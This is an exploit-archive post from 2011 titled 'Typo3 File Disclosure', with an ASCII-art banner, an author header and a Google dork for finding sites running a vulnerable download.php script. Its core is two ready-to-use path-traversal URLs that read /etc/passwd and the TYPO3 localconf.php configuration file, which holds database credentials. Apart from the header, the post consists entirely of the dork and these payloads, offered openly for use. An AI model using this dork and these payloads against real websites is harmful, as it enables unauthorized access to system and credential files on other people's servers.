Home / exploits Typo3 File Disclosure
Posted on 30 September 2011
________________________________________________________________________________________ | _ _ | | ||\ || || || | \ // | ____ ________ __________ | | || \ || || || | |\ //| | | | ______| |_______/ / | | || \ || || || | | \ // | | | _ | | / / | | || \ || || || | | \ // | | | |_) | | |______ /`'__ / / | | || \ || || || | | \ // | | | _ < | ______| / / / | | || \ || ||_______|| | | \// | | | |_) | | |______ \_ / / | | || \|| |_________| |_| / |_| |_____/ |________| /_/ /_/ | |_________________________________________________________________________________________| ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ # Exploit Title: [Typo3 File Disclosure] # Google Dork: [inurl:"/fileadmin/download.php?Fichier_a_telecharger=*"] # Date: [29/09/2011] # Author: [Number 7] # Contact :spam[-]tn[.]cs[@]live[.]fr # Software Link: [http://typo3.org/] # Tested on: [linux] ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ http://127.0.0.1/fileadmin/download.php?Fichier_a_telecharger=../../../../../etc/passwd http://localhost/path/fileadmin/download.php?Fichier_a_telecharger=../typo3conf/localconf.php ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Made In Tunisia // Kairouan // Mansoura City :D
